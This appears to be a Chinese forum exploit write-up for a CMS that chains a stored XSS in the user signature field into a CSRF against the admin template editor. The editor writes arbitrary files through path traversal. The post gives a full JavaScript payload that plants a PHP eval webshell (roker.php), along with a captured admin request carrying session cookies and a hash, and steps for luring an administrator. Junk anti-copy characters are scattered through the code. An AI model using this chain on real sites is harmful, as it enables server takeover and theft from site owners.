这个 CMS 以前在 90 上有人发过一个 getshell,当时是后台验证文件的问题,官网已经修补了,所以重新下了源码来看。
因为后台登录还需要认证码,所以注入就没有看。
存在存储型 XSS。
漏洞文件:user/member/skin_edit.php(用户签名输出处,直接 echo,没有做 HTML 编码):
3 F% e9 F+ x M9 _3 a本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:! e# G; W9 Y# I8 |- }
, m) u5 m G2 K7 j/ i* c: m
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
7 Z+ Q K+ j6 c! I: y% ~ ! j7 n% F c f& ^4 @/ P: m7 x
</textarea></td></tr>" _; s' x F4 A' b; j
user/do.php(保存资料的处理分支,op=zl):
if($op=='zl'){ //资料+ a3 {$ C2 {6 F
// Profile save (op=zl): QQ, nickname, city and e-mail are mandatory.
// PHP's empty() also rejects '0' and 0, so a literal "0" in any of these
// counts as missing. The signature (CS_Qianm) is deliberately not checked
// here and may be blank. NOTE(review): these look like request-supplied
// variables (the form field is named CS_Qianm); nothing in this block
// validates or escapes their content.
$missing = empty($CS_QQ) || empty($CS_Nichen) || empty($CS_City) || empty($CS_Email);
if ($missing) {
    exit(Msg_Error('抱歉,请把资料填写完整!', 'javascript:history.go(-1);'));
}
// Build the UPDATE for the current user's row (matched on CS_Name =
// $cscms_name, presumably the logged-in user's name). Every value is
// spliced straight into the SQL text: CS_Nichen, CS_Email, CS_City, CS_QQ
// and CS_Qianm as quoted strings, CS_Sex unquoted. NOTE(review): this
// block escapes none of them — whether a global filter (magic_quotes /
// addslashes) ran earlier is not visible here. If it did not, the unquoted
// CS_Sex and every quoted field are SQL injection on top of CS_Qianm being
// the stored-XSS sink; prefer whatever escaping or prepared-statement API
// $db offers.
$table = Getdbname('user');
$assignments = "CS_Nichen='" . $CS_Nichen . "',"
    . "CS_Email='" . $CS_Email . "',"
    . "CS_Sex=" . $CS_Sex . ","
    . "CS_City='" . $CS_City . "',"
    . "CS_QQ='" . $CS_QQ . "',"
    . "CS_Qianm='" . $CS_Qianm . "'";
$sql = "update " . $table . " set " . $assignments . " where CS_Name='" . $cscms_name . "'";
// Run the UPDATE. Both outcomes end the request with Msg_Error — which
// here doubles as the success dialog — and send the browser back one page.
$updated = $db->query($sql);
if (!$updated) {
    exit(Msg_Error('抱歉,修改失败了!', 'javascript:history.go(-1);'));
}
exit(Msg_Error('恭喜您,修改成功了!', 'javascript:history.go(-1);'));
签名(CS_Qianm)在 user/do.php 入库时没有任何过滤,skin_edit.php 输出时又没有做 HTML 编码,所以产生了存储型 XSS。
后台看了下,很奇葩的是模板编辑接口(admin/skins/skins.php,ac=xgmb&op=go)可以写任意文件名、任意格式的文件:name 参数直接决定文件名(aaa.php 也行),path 参数还可以用 ../ 跳出模板目录,而且整个请求里看不到任何 CSRF token。修复上至少要给这个接口加 token 校验、把 path 限制在模板目录内并只允许模板扩展名。
抓包如下(本机测试环境;另外注意 cookie 里直接带着 CS_AdminPassWord 这样一个 32 位十六进制值,看起来像口令散列,值得单独再查一下):
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造如下 JS。思路:把它塞进签名里,管理员在带着后台登录 cookie 的浏览器中渲染到这段签名时,脚本自动生成并提交一个指向模板编辑接口的 POST 表单,也就是用存储型 XSS 触发的 CSRF:
9 g; O5 B1 M F, B2 ^本帖隐藏的内容<script> 3 Q9 A0 h8 q2 u& \# b# Q% u
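// Absolute URL of the admin template editor on whatever site the victim is
// currently on. The host comes from top.location, i.e. the outermost
// document (presumably the browser blocks that read if this script ever
// ends up framed by another origin; the profile-page trigger below is not
// framed). The scheme is hard-coded to http://, so an https-only site
// would get a mixed-content POST. path=../../skins/index/html/ is what
// makes the editor write outside its own template directory.
// Declared with var instead of an implicit global so it is an explicit
// script-level binding.
var thisTHost = "http://" + top.location.hostname +
    "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";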
/**
 * Build a throw-away HTML form with two hidden fields, "name" and
 * "content", and auto-submit it as a POST to `url`. The browser attaches
 * the victim's cookies for that origin, which is the whole point: run in an
 * admin's session, the POST reaches the template editor with admin
 * privileges (a CSRF fired from the stored XSS).
 *
 * @param {string} url  - form action (the skins.php editor endpoint)
 * @param {string} data - value of the "name" field (file name to write)
 * @param {string} msg  - value of the "content" field (file body)
 * @returns {undefined} the page navigates away on submit()
 */
function PostSubmit(url, data, msg) {
    // Hidden input named `fieldName` carrying `fieldValue`.
    function hiddenField(fieldName, fieldValue) {
        var field = document.createElement("input");
        field.setAttribute("name", fieldName);
        field.setAttribute("type", "hidden");
        field.value = fieldValue;
        return field;
    }

    var form = document.createElement("FORM");
    document.body.appendChild(form);
    form.method = "POST";
    form.appendChild(hiddenField("name", data));
    form.appendChild(hiddenField("content", msg));
    form.action = url;
    form.submit();
}
// Fire the CSRF: write roker.php next to the index templates with a
// one-line PHP backdoor that eval()s whatever arrives in POST field "123".
(function () {
    var shellName = "roker.php";
    var shellBody = "<?php @eval($_POST[123]);?>";
    PostSubmit(thisTHost, shellName, shellBody);
}());
1 n3 Y1 z8 X5 F; H* ^! w</script>
利用:在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的"签名"处插入上面的脚本;然后用自己的账号给管理员写一条私信,或者让他访问你的主页 http://127.0.0.1/home/?uid=2(uid 改成自己的)。只要管理员是在后台登录状态下打开的,脚本就会以他的身份提交那个 POST,在 skins\index\html\ 目录下生成 roker.php 一句话木马(eval 的是 POST 参数 123)。